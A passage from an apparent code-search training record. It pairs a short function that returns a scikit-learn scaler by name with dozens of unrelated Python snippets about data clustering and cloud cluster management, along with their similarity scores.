HierarchicalClusteringAlgorithm\n }", "def makeClustering(data, x_scaled, coef, random_s=42, algo='kmeans', epsilon=0.5):\n #Random seed fix\n np.random.seed(random_s)\n #Check if the input user on algo variable is in our list\n algos = ['kmeans', 'hierarchical', 'db_scan']\n if algo not in algos:\n raise ValueError(\"Algorithme pas bon. Voici la liste dispo: %s\" % algos)\n #if kmeans :\n if algo == 'kmeans':\n try:\n clust = coef.iloc[0, 0] #If nbr_clust comes from the silhouette's function\n except AttributeError:\n clust = coef #if it's from user's input\n data_clust = clustering.kmeansClustering(data, x_scaled, clust, random_s)\n #If hierarchical clustering\n if algo == 'hierarchical':\n print('Still in build, use kmeans or db_scan for now')\n #If DB_SCAN\n if algo == 'db_scan':\n data_clust = clustering.db_scanClustering(data, x_scaled, random_s, epsilon, coef)\n return data_clust", "def cluster_by_partitioning(active_sites):\n cls, sc = k_means(active_sites)\n\n return cls", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def __init__(self: AutoScalingCluster,\n source: Iterable[str] = None,\n num_tasks: int = 1,\n template: str = DEFAULT_TEMPLATE,\n bundlesize: int = DEFAULT_BUNDLESIZE,\n bundlewait: int = DEFAULT_BUNDLEWAIT,\n bind: Tuple[str, int] = ('0.0.0.0', QueueConfig.port),\n delay_start: float = DEFAULT_DELAY,\n launcher: str = DEFAULT_AUTOSCALE_LAUNCHER,\n launcher_args: List[str] = None,\n remote_exe: str = 'hyper-shell',\n max_retries: int = DEFAULT_ATTEMPTS,\n eager: bool = False,\n redirect_failures: IO = None,\n capture: bool = False,\n policy: str = DEFAULT_AUTOSCALE_POLICY,\n period: int = DEFAULT_AUTOSCALE_PERIOD,\n factor: float = DEFAULT_AUTOSCALE_FACTOR,\n init_size: int = DEFAULT_AUTOSCALE_INIT_SIZE,\n min_size: int = DEFAULT_AUTOSCALE_MIN_SIZE,\n max_size: int = DEFAULT_AUTOSCALE_MAX_SIZE,\n forever_mode: bool = False, # noqa: ignored (passed by ClusterApp)\n restart_mode: bool = False, # noqa: ignored (passed by ClusterApp)\n in_memory: bool = False, # noqa: ignored (passed by ClusterApp)\n no_confirm: bool = False, # noqa: ignored (passed by ClusterApp)\n client_timeout: int = None,\n task_timeout: int = None\n ) -> None:\n auth = secrets.token_hex(64)\n self.server = ServerThread(source=source, auth=auth, bundlesize=bundlesize, bundlewait=bundlewait,\n max_retries=max_retries, eager=eager, address=bind, forever_mode=True,\n redirect_failures=redirect_failures)\n launcher_args = '' if launcher_args is None else ' '.join(launcher_args)\n client_args = '' if not capture else '--capture'\n if client_timeout is not None:\n client_args += f' -T {client_timeout}'\n if task_timeout is not None:\n client_args += f' -W {task_timeout}'\n launcher = (f'{launcher} {launcher_args} {remote_exe} client -H {HOSTNAME} -p {bind[1]} '\n f'-N {num_tasks} -b {bundlesize} -w {bundlewait} -t \"{template}\" -k {auth} '\n f'-d {delay_start} {client_args}')\n self.autoscaler = AutoScalerThread(policy=policy, factor=factor, period=period,\n init_size=init_size, min_size=min_size, max_size=max_size,\n launcher=launcher)\n super().__init__(name='hypershell-cluster')", "def getClusterJob(pool, sample=None, chrom=None): \r\n if sample != None:\r\n if sample not in clusterJobs:\r\n clusterJobs[sample] = ClusterJob(sample.outputDir + sample.libName + \"Job.sh\")\r\n return clusterJobs[sample]\r\n elif chrom != None:\r\n if chrom not in clusterJobs:\r\n clusterJobs[chrom] = ClusterJob(pool.outputDir + chrom +\"_\" + pool.poolName + \"Job.sh\")\r\n return clusterJobs[chrom]\r\n clusterJobs[pool] = ClusterJob(pool.outputDir + pool.poolName + \"Job.sh\")\r\n return clusterJobs[pool]", "def get_cluster_name():\n cookiecutter_path = Path(\"cookiecutter.json\")\n cookiecutter_dict = json.loads(cookiecutter_path.read_text())\n cluster_name = \"\"\n try:\n cluster_name = cookiecutter_dict[\"cluster_name\"]\n except KeyError:\n while not cluster_name:\n cluster_name = input(\"Please insert the cluster name: \")\n finally:\n cookiecutter_dict[\"cluster_name\"] = cluster_name\n cookiecutter_path.write_text(json.dumps(cookiecutter_dict, indent=2))\n return cluster_name", "def get_coe_cluster(self, name_or_id, filters=None):\n return _utils._get_entity(self, 'coe_cluster', name_or_id, filters)", "def __init__(__self__, resource_name, opts=None, enabled_cluster_log_types=None, name=None, role_arn=None, tags=None, version=None, vpc_config=None, __props__=None, __name__=None, __opts__=None):\n if __name__ is not None:\n warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning)\n resource_name = __name__\n if __opts__ is not None:\n warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning)\n opts = __opts__\n if opts is None:\n opts = pulumi.ResourceOptions()\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.version is None:\n opts.version = utilities.get_version()\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = dict()\n\n __props__['enabled_cluster_log_types'] = enabled_cluster_log_types\n __props__['name'] = name\n if role_arn is None:\n raise TypeError(\"Missing required property 'role_arn'\")\n __props__['role_arn'] = role_arn\n __props__['tags'] = tags\n __props__['version'] = version\n if vpc_config is None:\n raise TypeError(\"Missing required property 'vpc_config'\")\n __props__['vpc_config'] = vpc_config\n __props__['arn'] = None\n __props__['certificate_authority'] = None\n __props__['created_at'] = None\n __props__['endpoint'] = None\n __props__['identities'] = None\n __props__['platform_version'] = None\n __props__['status'] = None\n super(Cluster, __self__).__init__(\n 'aws:eks/cluster:Cluster',\n resource_name,\n __props__,\n opts)", "def create_cluster():\n config = get_kube_config()\n command = CLUSTER_CREATE_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n machine_type=config['machine_type'],\n disk_size=config['disk_size'],\n nodes=config['nodes'],\n zone=config['zone'])\n print \"Creating cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))\n command = AUTH_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n zone=config['zone'])\n print \"Authenticating with cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))", "def run_example_cluster_cmd(example_module_name, example_argv):\n run_example_cluster(example_module_name, example_argv)", "def launch_cluster(self):\n version = self.get_latest_spark_version()\n import os\n real_path = os.path.dirname(os.path.realpath(__file__))\n if self.is_aws():\n with open(real_path+'/../data/aws_cluster.json', 'r') as fp:\n cluster_json = json.loads(fp.read())\n else:\n with open(real_path+'/../data/azure_cluster.json', 'r') as fp:\n cluster_json = json.loads(fp.read())\n # set the latest spark release regardless of defined cluster json\n cluster_json['spark_version'] = version['key']\n c_info = self.post('/clusters/create', cluster_json)\n self.wait_for_cluster(c_info['cluster_id'])\n return c_info['cluster_id']", "def Run(self, args):\n client = api_util.AlloyDBClient(self.ReleaseTrack())\n alloydb_client = client.alloydb_client\n alloydb_messages = client.alloydb_messages\n cluster_ref = client.resource_parser.Create(\n 'alloydb.projects.locations.clusters',\n projectsId=properties.VALUES.core.project.GetOrFail,\n locationsId=args.region, clustersId=args.cluster)\n req = alloydb_messages.AlloydbProjectsLocationsClustersGetRequest(\n name=cluster_ref.RelativeName()\n )\n cluster = alloydb_client.projects_locations_clusters.Get(req)\n normalize_automated_backup_policy(cluster.automatedBackupPolicy)\n return cluster", "def __init__(self, rank=10, clusters=1, iterations=3, metric='euclidean'):\n\n sk_kmeans.__init__(self, n_clusters=clusters, max_iter=iterations)\n # Cluster ranks is a list of lists of knn sorted elements for each cluster w.r.t. the cluster mean\n self.rank = rank\n self.metric = metric", "def generate_cluster_name():\n ADJECTIVES = (\n \"autumn\", \"hidden\", \"bitter\", \"misty\", \"silent\", \"empty\", \"dry\", \"dark\",\n \"summer\", \"icy\", \"quiet\", \"white\", \"cool\", \"winter\", \"quick\",\n \"patient\", \"twilight\", \"crimson\", \"wispy\", \"weathered\", \"blue\",\n \"broken\", \"cold\", \"damp\", \"falling\", \"frosty\", \"green\",\n \"lingering\", \"bold\", \"little\", \"morning\", \"muddy\", \"old\",\n \"red\", \"rough\", \"still\", \"small\", \"sparkling\", \"tasty\", \"shy\",\n \"wandering\", \"withered\", \"wild\", \"black\", \"mellow\" \"holy\", \"solitary\",\n \"snowy\", \"proud\", \"floral\", \"restless\", \"divine\",\n \"ancient\", \"purple\", \"lively\", \"nameless\", \"tossed\"\n )\n\n ANIMAL_NOUNS = (\n \"alligators\", \"crocodiles\", \"ants\", \"antelopes\", \"badgers\", \"bees\",\n \"buffalos\", \"butterflies\", \"cheetahs\", \"coyotes\", \"dolphins\", \"elephants\",\n \"foxes\", \"giraffes\", \"gorillas\", \"hedgehogs\", \"hornets\", \"hyenas\", \"jackals\",\n \"kangaroos\", \"leopards\", \"lions\", \"lizards\", \"mammoths\", \"porcupines\",\n \"rabbits\", \"racoons\", \"rhinos\", \"sharks\", \"snails\", \"snakes\", \"spiders\",\n \"squirrels\", \"tigers\", \"wasps\", \"whales\", \"wolves\", \"wombats\", \"zebras\", \"salad\"\n )\n\n return u\"%s %s\" % (random.choice(ADJECTIVES), random.choice(ANIMAL_NOUNS), )", "def main():\n parser = argparse.ArgumentParser(description=main.__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('--config', required=True, help='Configuration file for run. Must be in shared_dir')\n parser.add_argument('-c', '--cluster_size', required=True, help='Number of workers desired in the cluster.')\n parser.add_argument('-s', '--sample_size', required=True, type=float, help='Size of the sample deisred in TB.')\n parser.add_argument('-t', '--instance_type', default='c3.8xlarge', help='e.g. m4.large or c3.8xlarge.')\n parser.add_argument('-n', '--cluster_name', required=True, help='Name of cluster.')\n parser.add_argument('--namespace', default='jtvivian', help='CGCloud NameSpace')\n parser.add_argument('--spot_price', default=0.60, help='Change spot price of instances')\n parser.add_argument('-b', '--bucket', default='tcga-data-cgl-recompute', help='Bucket where data is.')\n parser.add_argument('-d', '--shared_dir', required=True,\n help='Full path to directory with: pipeline script, launch script, config, and master key.')\n params = parser.parse_args()\n\n # Run sequence\n start = time.time()\n # Get number of samples from config\n with open(params.config, 'r') as f:\n num_samples = len(f.readlines())\n # Launch cluster and pipeline\n uuid = fix_launch(params)\n launch_cluster(params)\n ids = get_instance_ids(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-worker')\n launch_pipeline(params)\n # Blocks until all workers are idle\n stop = time.time()\n # Collect metrics from cluster\n collect_metrics(ids, list_of_metrics, start, stop, uuid=uuid)\n # Apply \"Insta-kill\" alarm to every worker\n map(apply_alarm_to_instance, ids)\n # Kill leader\n logging.info('Killing Leader')\n leader_id = get_instance_ids(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-leader')[0]\n apply_alarm_to_instance(leader_id, threshold=5)\n # Generate Run Report\n avail_zone = get_avail_zone(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-worker')[0]\n total_cost, avg_hourly_cost = calculate_cost(params.instance_type, ids[0], avail_zone)\n # Report values\n output = ['UUID: {}'.format(uuid),\n 'Number of Samples: {}'.format(num_samples),\n 'Number of Nodes: {}'.format(params.cluster_size),\n 'Cluster Name: {}'.format(params.cluster_name),\n 'Source Bucket: {}'.format(params.bucket),\n 'Average Hourly Cost: ${}'.format(avg_hourly_cost),\n 'Cost per Instance: ${}'.format(total_cost),\n 'Availability Zone: {}'.format(avail_zone),\n 'Start Time: {}'.format(datetime.isoformat(datetime.utcfromtimestamp(start))),\n 'Stop Time: {}'.format(datetime.isoformat(datetime.utcfromtimestamp(stop))),\n 'Total Cost of Cluster: ${}'.format(float(total_cost) * int(params.cluster_size)),\n 'Cost Per Sample: ${}'.format((float(total_cost) * int(params.cluster_size) / int(num_samples)))]\n with open(os.path.join(str(uuid) + '_{}'.format(str(datetime.utcnow()).split()[0]), 'run_report.txt'), 'w') as f:\n f.write('\\n'.join(output))\n # You're done!\n logging.info('\\n\\nScaling Test Complete.')", "def create_cluster(df,validate, test, X, k, name):\n \n scaler = StandardScaler(copy=True).fit(df[X])\n X_scaled = pd.DataFrame(scaler.transform(df[X]), columns=df[X].columns.values).set_index([df[X].index.values])\n kmeans = KMeans(n_clusters = k, random_state = 42)\n kmeans.fit(X_scaled)\n kmeans.predict(X_scaled)\n df[name] = kmeans.predict(X_scaled)\n df[name] = 'cluster_' + df[name].astype(str)\n \n v_scaled = pd.DataFrame(scaler.transform(validate[X]), columns=validate[X].columns.values).set_index([validate[X].index.values])\n validate[name] = kmeans.predict(v_scaled)\n validate[name] = 'cluster_' + validate[name].astype(str)\n \n t_scaled = pd.DataFrame(scaler.transform(test[X]), columns=test[X].columns.values).set_index([test[X].index.values])\n test[name] = kmeans.predict(t_scaled)\n test[name] = 'cluster_' + test[name].astype(str)\n \n centroids = pd.DataFrame(scaler.inverse_transform(kmeans.cluster_centers_), columns=X_scaled.columns)\n return df, X_scaled, scaler, kmeans, centroids", "def recluster(cluster, min_size, guard, func):\r\n if cluster.get_length() == 0:\r\n return\r\n if cluster.get_length() <= min_size:\r\n return cluster\r\n sim = func(cluster.get_tweets())\r\n if sim < guard:\r\n kmeans = TweetKMeans(2)\r\n kmeans.set_data(cluster.get_tweets())\r\n return kmeans.start_algorithm()\r\n return cluster", "def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])", "def clustering(dataset, logger):\n all_instances = dataset\n meta_dataset = collections.defaultdict(list)\n for instance in all_instances:\n meta_dataset[instance['label']].append(instance['coordinate'])\n\n tasklist = map(\n lambda item, meta_dataset=meta_dataset, logger=logger: (\n item[0],\n clustering_by_label,\n (item[1], item[0], meta_dataset, logger)), meta_dataset.items())\n\n # pool = multiprocessing.pool.Pool(PROCESS_COUNT)\n # clusters = dict(pool.map(map_generate_tuple, tasklist))\n clusters = dict(map(map_generate_tuple, tasklist))\n # pool.close()\n # pool.join()\n\n return clusters", "def load(name):\n\n clovr = pymongo.Connection().clovr\n clusters = clovr.clusters\n instances = clovr.instances\n \n cluster = clusters.find_one(dict(name=name))\n if not cluster:\n raise ClusterDoesNotExist(name)\n\n\n return cluster", "def cluster_spec(num_workers, num_ps):\n cluster = {}\n port = 12222\n\n all_ps = []\n host = '127.0.0.1'\n for _ in range(num_ps):\n all_ps.append(\"{}:{}\".format(host, port))\n port += 1\n cluster['ps'] = all_ps\n\n all_workers = []\n for _ in range(num_workers):\n all_workers.append(\"{}:{}\".format(host, port))\n port += 1\n cluster['worker'] = all_workers\n return cluster", "def _setup_cluster(self):\n raise NotImplementedError('Must be implemented in subclasses.')", "def _create_cluster_from_index(self, index):\n return Cluster(index=index)", "def __init__(\n self,\n name: str,\n path_data: Path,\n path_model: Path,\n clean_f: Callable[..., str] = lambda x: x,\n cluster_thr: float = .9,\n ) -> None:\n self.clean_f = clean_f\n self._name = name\n self._sim_thr = cluster_thr\n self._path_data = path_data\n self._path_model = path_model\n self._clusters: Dict[str, Optional[str]] = {} # Known clusters and labels\n self._clusters_val: Dict[str, Optional[str]] = {} # Validation clusters and labels\n self._centroids: Dict[str, np.ndarray] = {} # Cache for the cluster centroids\n \n # Load previously known clusters, if exists\n self.load()", "def get_cluster_name(admin_socket):\n\n m = ADMIN_SOCKET_PATTERN.match(admin_socket)\n name = None\n if m:\n name = m.group(1)\n return name", "def _create_cluster_from_index(self, index):\n return VRPCluster(index=index, demand=self.demands[index])", "def cluster_create():\n logger.info(\"/cluster action=\" + r.method)\n request_debug(r, logger)\n if not r.form[\"name\"] or not r.form[\"host_id\"] or not \\\n r.form[\"consensus_plugin\"] or not r.form[\"size\"]:\n logger.warning(\"cluster post without enough data\")\n response_fail[\"error\"] = \"cluster POST without enough data\"\n response_fail[\"data\"] = r.form\n return jsonify(response_fail), CODE_BAD_REQUEST\n else:\n name, host_id, consensus_plugin, consensus_mode, size = \\\n r.form['name'], r.form['host_id'], r.form['consensus_plugin'],\\\n r.form['consensus_mode'] or CONSENSUS_MODES[0], int(r.form[\n \"size\"])\n if consensus_plugin not in CONSENSUS_PLUGINS:\n logger.debug(\"Unknown consensus_plugin={}\".format(\n consensus_plugin))\n return jsonify(response_fail), CODE_BAD_REQUEST\n if consensus_plugin != CONSENSUS_PLUGINS[0] and consensus_mode \\\n not in CONSENSUS_MODES:\n logger.debug(\"Invalid consensus, plugin={}, mode={}\".format(\n consensus_plugin, consensus_mode))\n return jsonify(response_fail), CODE_BAD_REQUEST\n\n if size not in CLUSTER_SIZES:\n logger.debug(\"Unknown cluster size={}\".format(size))\n return jsonify(response_fail), CODE_BAD_REQUEST\n if cluster_handler.create(name=name, host_id=host_id,\n consensus_plugin=consensus_plugin,\n consensus_mode=consensus_mode,\n size=size):\n logger.debug(\"cluster POST successfully\")\n return jsonify(response_ok), CODE_CREATED\n else:\n logger.debug(\"cluster creation failed\")\n response_fail[\"error\"] = \"Failed to create cluster {}\".format(\n name)\n return jsonify(response_fail), CODE_BAD_REQUEST", "def __init__(\n self,\n clustering_algorithm,\n n_clusters: int,\n cluster_args: dict,\n checkpoints_path: str,\n batch_size: int = 1024,\n is_batched: bool = False):\n super().__init__()\n self.clustering_algorithm = clustering_algorithm\n self.n_clusters = n_clusters\n self.batch_size = batch_size\n self.cluster_args = cluster_args\n self.checkpoints_path = checkpoints_path\n self.is_batched = is_batched", "def parse_cluster(\n fasta_path, file_dict=None, file_writer=None, neighbor_joining=False\n):\n cluster_id = fasta_path.name[:-3]\n outdir = fasta_path.parent\n clusters = parse_cluster_fasta(fasta_path)\n if len(clusters) < 2:\n # fasta_path.unlink()\n logger.error(f\"Singleton Cluster {cluster_id} is size {len(clusters)}\")\n cluster_dict = {\n \"size\": len(clusters),\n \"n_memb\": None,\n \"n_members\": None,\n \"n_adj\": None,\n \"adj_groups\": None,\n }\n return int(cluster_id)\n # calculate MSA and return guide tree\n muscle_args = [\n \"-in\",\n f\"{outdir}/{cluster_id}.fa\",\n \"-out\",\n f\"{outdir}/{cluster_id}.faa\",\n \"-diags\",\n \"-sv\",\n \"-maxiters\",\n \"2\",\n \"-quiet\",\n \"-distance1\",\n \"kmer20_4\",\n ]\n if len(clusters) >= 4:\n muscle_args += [\n \"-tree2\",\n f\"{outdir}/{cluster_id}.nwk\",\n ]\n if neighbor_joining:\n muscle_args += [\"-cluster2\", \"neighborjoining\"] # adds 20%\n try:\n muscle = sh.Command(\"muscle\", search_paths=SEARCH_PATHS)\n except sh.CommandNotFound:\n logger.error(\"muscle must be installed first.\")\n sys.exit(1)\n muscle(muscle_args)\n # fasta_path.unlink()\n clusters[\"prot.idx\"] = clusters[\"path\"].map(file_dict)\n clusters.sort_values(by=[\"prot.idx\", \"frag.id\", \"frag.pos\"], inplace=True)\n n_adj, adj_gr_count, unused_adj_group = calculate_adjacency_group(\n clusters[\"frag.pos\"], clusters[\"frag.idx\"]\n )\n idx_values = clusters[\"prot.idx\"].value_counts()\n idx_list = list(idx_values.index)\n idx_list.sort()\n write_tsv_or_parquet(clusters, outdir / f\"{cluster_id}.{CLUSTER_FILETYPE}\")\n cluster_dict = {\n \"size\": len(clusters),\n \"n_memb\": len(idx_values),\n \"n_members\": str(idx_list),\n \"n_adj\": n_adj,\n \"adj_groups\": adj_gr_count,\n }\n for group_id, subframe in clusters.groupby(by=[\"prot.idx\"]):\n proteome_frame = subframe.copy()\n proteome_frame[\"hom.cluster\"] = cluster_id\n proteome_frame[\"hom.cl_size\"] = len(idx_values)\n proteome_frame.drop(\n proteome_frame.columns.drop(HOMOLOGY_COLS), # drop EXCEPT these\n axis=1,\n inplace=True,\n )\n with file_writer(group_id) as file_handle:\n proteome_frame.to_csv(file_handle, header=False, sep=\"\\t\")\n return int(cluster_id), cluster_dict", "def extract_clusters(self, dictionary=None, autorenaming_option=True):\n cluster_list = self.__dendrogram._extract_clusters_by_color()\n return cluster_list if autorenaming_option is False else self.__autorename_clusters(cluster_list, dictionary, 5)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"auto_renew\"] = auto_renew\n __props__.__dict__[\"auto_renew_period\"] = auto_renew_period\n __props__.__dict__[\"cluster_name\"] = cluster_name\n __props__.__dict__[\"data_center_name\"] = data_center_name\n __props__.__dict__[\"disk_size\"] = disk_size\n __props__.__dict__[\"disk_type\"] = disk_type\n __props__.__dict__[\"enable_public\"] = enable_public\n __props__.__dict__[\"instance_type\"] = instance_type\n __props__.__dict__[\"ip_white\"] = ip_white\n __props__.__dict__[\"maintain_end_time\"] = maintain_end_time\n __props__.__dict__[\"maintain_start_time\"] = maintain_start_time\n __props__.__dict__[\"major_version\"] = major_version\n __props__.__dict__[\"node_count\"] = node_count\n __props__.__dict__[\"password\"] = password\n __props__.__dict__[\"pay_type\"] = pay_type\n __props__.__dict__[\"period\"] = period\n __props__.__dict__[\"period_unit\"] = period_unit\n __props__.__dict__[\"public_points\"] = public_points\n __props__.__dict__[\"security_groups\"] = security_groups\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def _load_cluster(self):", "def resource_type(self):\n return 'cluster'", "def cluster_start(r):\n cluster_id = request_get(r, \"cluster_id\")\n if not cluster_id:\n logger.warning(\"No cluster_id is given\")\n return make_fail_response(\"No cluster_id is given\")\n if cluster_handler.start(cluster_id):\n return jsonify(response_ok), CODE_OK\n\n return make_fail_response(\"cluster start failed\")", "def run_cluster(autoscaling: bool = False, **options) -> None:\n if autoscaling:\n thread = AutoScalingCluster.new(**options)\n else:\n thread = RemoteCluster.new(**options)\n try:\n thread.join()\n except Exception:\n thread.stop()\n raise", "def cluster_hierarchically(active_sites):\n\n\n cls, sc = agglomerative(active_sites)\n\n return cls", "def calrissian_make_tool(spec, loadingContext):\n if \"class\" in spec and spec[\"class\"] == \"CommandLineTool\":\n return CalrissianCommandLineTool(spec, loadingContext)\n else:\n return default_make_tool(spec, loadingContext)", "def create_cluster(\n self,\n name: str,\n cluster_type: Union[dto.ClusterType, str],\n params: Mapping[str, Any],\n ssh_key: str\n ) -> dto.Cluster:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def create_coe_cluster(\n self,\n name,\n cluster_template_id,\n **kwargs,\n ):\n cluster = self.container_infrastructure_management.create_cluster(\n name=name,\n cluster_template_id=cluster_template_id,\n **kwargs,\n )\n\n self.list_coe_clusters.invalidate(self)\n return cluster", "def init_cluster(\n self,\n node_name,\n ):\n # Gets the node IP address.\n ip = self.get_node_ip(node_name)\n\n # Initializes the swarm.\n docker_utils.swarm_init(\n hostname=ip,\n ssh_port=SSH_PORT,\n ssh_username=self.get_ssh_username(node_name),\n ssh_private_key_file=self.get_ssh_private_key_file(node_name),\n executor=node_name,\n logger=self._logger,\n )", "def get_cluster_from_string(cluster, running_clusters=None):\n # no running clusters given -> get them now\n if not running_clusters:\n running_clusters = util.get_cluster_specs()\n\n # json file (get spec)\n if re.search(r'\\.json$', cluster):\n cluster = Cluster(running_clusters=running_clusters, file=cluster, **util.read_json_spec(cluster, \"clusters\"))\n # cluster name (cluster must already exists in cloud)\n else:\n cluster_name = re.sub(r'_', '-', cluster)\n if cluster_name in running_clusters:\n cluster = Cluster(running_clusters=running_clusters, **running_clusters[cluster_name])\n else:\n raise util.TFCliError(\"ERROR: Given cluster {} not found in cloud!\".format(cluster_name))\n return cluster", "def lookup_cluster_by_name(cluster_name):\n cluster_root = get_cluster_root()\n if not cluster_root:\n print('Cannot get the root of the linked list of clusters')\n return\n cluster = None\n\n # lookup for the task associated with the id\n if cluster_root['cluster_']['name'].string() == cluster_name:\n cluster = cluster_root['cluster_'].address\n else:\n curr = cluster_root\n while True:\n curr = curr['next'].cast(uClusterDL_ptr_type)\n\n if curr['cluster_']['name'].string() == cluster_name:\n cluster = curr['cluster_'].address\n break\n\n if curr == cluster_root:\n break\n\n if not cluster:\n print(\n (\"Cannot find a cluster with the name: {}.\".format(cluster_name))\n )\n return cluster", "def cluster_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"cluster_name\")", "def create_redshift_cluster(redshift_client, role_arn):\n # Create the cluster if it doesn't exist.\n try:\n response = redshift_client.create_cluster(\n ClusterType=CLUSTER_TYPE,\n NodeType=NODE_TYPE,\n NumberOfNodes=NUM_NODES,\n DBName=DBNAME,\n ClusterIdentifier=IDENTIFIER,\n MasterUsername=USER,\n MasterUserPassword=PASSWORD,\n IamRoles=[role_arn]\n )\n except Exception as e:\n print(e)", "def get_cluster(self, profile):\n if self._value.has_option(profile, 'cluster'):\n if self._value.has_option(profile, 'cluster'):\n cluster = self._value.get(profile, 'cluster')\n self.logger.info(\"Connecting to: %s cluster\" % cluster)\n else:\n self.logger.error(\n \"No cluster parameter found\"\n )\n exit(1)\n else:\n self.logger.error(\n \"No profile found. Please define a default profile, \\\n or specify a named profile using `--profile`\"\n )\n exit(1)\n return cluster", "def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")", "def _cluster_name(index):\n if index < 26: return chr(97+index)\n else: return 'a'+chr(71+index)", "def getBestCluster():\r\n global bestCluster\r\n return bestCluster", "def running_cluster(request):\n cluster_name = 'running-cluster-' + random_string()\n launch_cluster(\n cluster_name=cluster_name,\n instance_type=request.param.instance_type,\n spark_version=request.param.spark_version,\n spark_git_commit=request.param.spark_git_commit)\n\n if request.param.restarted:\n stop_cluster(cluster_name)\n start_cluster(cluster_name)\n\n def destroy():\n p = subprocess.run([\n 'flintrock', 'destroy', cluster_name, '--assume-yes'])\n assert p.returncode == 0\n request.addfinalizer(destroy)\n\n return cluster_name", "def factory(args, cxn, log):\n name = args['assembler'].lower()\n assembler = ASSEMBLERS[name]\n return assembler(args, cxn, log)" ]
[ "0.5950856", "0.58060235", "0.5799281", "0.5795873", "0.5752199", "0.56631964", "0.55473256", "0.5533583", "0.5423363", "0.54131496", "0.53921217", "0.53843373", "0.53843373", "0.53843373", "0.5361153", "0.5359831", "0.53507227", "0.53416944", "0.5282299", "0.5266684", "0.526383", "0.52311033", "0.5228705", "0.52240753", "0.5216106", "0.51854485", "0.51847214", "0.5178425", "0.5169556", "0.5166051", "0.51647127", "0.51647127", "0.5158469", "0.5144696", "0.51275545", "0.5099692", "0.50876594", "0.50755626", "0.5070397", "0.50584537", "0.50469184", "0.5044523", "0.50431645", "0.5034745", "0.50037694", "0.49824303", "0.4973812", "0.49709788", "0.49709788", "0.49709788", "0.49709788", "0.49709788", "0.49695897", "0.4969097", "0.4968818", "0.49603143", "0.4957749", "0.495271", "0.4952464", "0.49488536", "0.49419105", "0.4940304", "0.4939434", "0.49280274", "0.49253702", "0.49247742", "0.49226195", "0.49194226", "0.4913093", "0.491292", "0.48933262", "0.4889577", "0.48847717", "0.4878126", "0.48779035", "0.48744586", "0.48709717", "0.4870932", "0.48585367", "0.48454052", "0.48378393", "0.48369476", "0.4830175", "0.4825441", "0.48175547", "0.48131913", "0.48082173", "0.47993258", "0.47929946", "0.47926193", "0.479107", "0.47897485", "0.47892463", "0.4780808", "0.4776917", "0.4776917", "0.47716695", "0.4762777", "0.47535342", "0.47469229" ]
0.7380628
0
get a sklearn scaler from a scaler name
def get_scaler(scaler): if scaler == 'standard': from sklearn.preprocessing import StandardScaler return StandardScaler() if scaler == 'minmax': from sklearn.preprocessing import MinMaxScaler return MinMaxScaler()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
